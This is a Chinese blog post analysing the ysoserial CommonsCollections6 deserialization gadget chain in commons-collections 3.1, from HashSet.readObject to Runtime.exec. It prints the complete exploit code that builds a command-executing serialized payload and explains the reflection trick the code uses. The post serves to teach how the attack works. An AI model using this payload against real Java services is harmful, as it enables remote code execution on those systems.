ysoserial学习之CommonsCollections6

前言

CommonCollections系列的gadgets我们在反序列化利用中用的很多,下面剖析一下ysoserial中CommonCollections6的调用链和原理。

实验环境:jdk1.8.0_211、commons-collections:commons-collections:3.1

代码分析

关键调用链如下

1
2
3
4
5
6
7
8
9
10
11
java.io.ObjectInputStream.readObject()
            java.util.HashSet.readObject()
                java.util.HashMap.put()
                java.util.HashMap.hash()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                        org.apache.commons.collections.map.LazyMap.get()
                            org.apache.commons.collections.functors.ChainedTransformer.transform()
                            org.apache.commons.collections.functors.InvokerTransformer.transform()
                            java.lang.reflect.Method.invoke()
                                java.lang.Runtime.exec()

从TiedMapEntry.getValue之后还是和cc5一样,不同之处在于如何触发到TiedMapEntry.getValue。cc6使用了TiedMapEntry.hashCode()触发了TiedMapEntry.getValue(),下面是TiedMapEntry.hashCode()代码

1
2
3
4
public int hashCode() {
       Object value = this.getValue();
       return (this.getKey() == null ? 0 : this.getKey().hashCode()) ^ (value == null ? 0 : value.hashCode());
   }

可以看到调用了getValue方法。

而TiedMapEntry.hashCode()由java.util.HashMap.hash()触发

1
2
3
4
static final int hash(Object key) {
       int h;
       return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
   }

此处若key的值为TiedMapEntry就和下一步串联了起来,那么我们顺着调用链继续向上,发现HashMap.hash是由HashMap.put调用的,put方法内容如下

1
2
3
public V put(K key, V value) {
       return putVal(hash(key), key, value, false, true);
   }

到这里我们发现,只要我们调用了put(key,value),key为LazyMap,就可以和后面相串联。接着向上看,作者使用了HashSet的readObject方法作为出发点,调用了put(key,value)。HashSet的readObject的方法内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Read in any hidden serialization magic
        s.defaultReadObject();

        // Read capacity and verify non-negative.
        int capacity = s.readInt();
        if (capacity < 0) {
            throw new InvalidObjectException("Illegal capacity: " +
                                             capacity);
        }

        // Read load factor and verify positive and non NaN.
        float loadFactor = s.readFloat();
        if (loadFactor <= 0 || Float.isNaN(loadFactor)) {
            throw new InvalidObjectException("Illegal load factor: " +
                                             loadFactor);
        }

        // Read size and verify non-negative.
        int size = s.readInt();
        if (size < 0) {
            throw new InvalidObjectException("Illegal size: " +
                                             size);
        }
        // Set the capacity according to the size and load factor ensuring that
        // the HashMap is at least 25% full but clamping to maximum capacity.
        capacity = (int) Math.min(size * Math.min(1 / loadFactor, 4.0f),
                HashMap.MAXIMUM_CAPACITY);

        // Constructing the backing map will lazily create an array when the first element is
        // added, so check it before construction. Call HashMap.tableSizeFor to compute the
        // actual allocation size. Check Map.Entry[].class since it's the nearest public type to
        // what is actually created.

        SharedSecrets.getJavaOISAccess()
                     .checkArray(s, Map.Entry[].class, HashMap.tableSizeFor(capacity));

        // Create backing HashMap
        map = (((HashSet<?>)this) instanceof LinkedHashSet ?
               new LinkedHashMap<E,Object>(capacity, loadFactor) :
               new HashMap<E,Object>(capacity, loadFactor));

        // Read in all elements in the proper order.
        for (int i=0; i<size; i++) {
            @SuppressWarnings("unchecked")
                E e = (E) s.readObject();
            map.put(e, PRESENT);                        //看这里!!!
        }
    }

这样下来目标就很明确了,只要我们在HashSet的键值对中放置一个键值对,其中键为LazyMap,在反序列化后就会触发到形如map.put(LazyMap,PRESENT)的方法,从而触发调用链。

下面附上cc6 exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
public Serializable getObject(final String command) throws Exception {

       final String[] execArgs = new String[] { command };

       final Transformer[] transformers = new Transformer[] {
               new ConstantTransformer(Runtime.class),
               new InvokerTransformer("getMethod", new Class[] {
                       String.class, Class[].class }, new Object[] {
                       "getRuntime", new Class[0] }),
               new InvokerTransformer("invoke", new Class[] {
                       Object.class, Object[].class }, new Object[] {
                       null, new Object[0] }),
               new InvokerTransformer("exec",
                       new Class[] { String.class }, execArgs),
               new ConstantTransformer(1) };

       Transformer transformerChain = new ChainedTransformer(transformers);

       final Map innerMap = new HashMap();

       final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

       TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

       HashSet map = new HashSet(1);
       map.add("foo");
       Field f = null;
       try {
           f = HashSet.class.getDeclaredField("map");
       } catch (NoSuchFieldException e) {
           f = HashSet.class.getDeclaredField("backingMap");
       }

       Reflections.setAccessible(f);
       HashMap innimpl = (HashMap) f.get(map);

       Field f2 = null;
       try {
           f2 = HashMap.class.getDeclaredField("table");
       } catch (NoSuchFieldException e) {
           f2 = HashMap.class.getDeclaredField("elementData");
       }

       Reflections.setAccessible(f2);
       Object[] array = (Object[]) f2.get(innimpl);

       Object node = array[0];
       if(node == null){
           node = array[1];
       }

       Field keyField = null;
       try{
           keyField = node.getClass().getDeclaredField("key");
       }catch(Exception e){
           keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
       }

       Reflections.setAccessible(keyField);
       keyField.set(node, entry);

       return map;

   }

cc6的map.add(“foo”)以及之后的代码的作用是什么?

大家一般对于cc6 exp疑惑的点在于map.add(“foo”)以及之后的代码的作用是什么,最朴素的想法是map.add的参数直接设置为LazyMap,这样在反序列化之后就会触发到调用链。虽然说这种做法理论上可以触发到调用链,但我们首选观察一下map.add也就是HashSet.add的代码

1
2
3
public boolean add(E e) {
       return map.put(e, PRESENT)==null;
   }

我们看到此处也会调用map.put(e, PRESENT),从而提前触发调用链,导致抛出异,无法生成最终的反序列化payload。而作者首先add了一个无关紧要的字符串,然后通过一些反射技巧将map中的字符串修改为了LazyMap。避免了提前触发到map.put,非常精妙。

img

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

huahua<br><br>虚心学习,不断进步。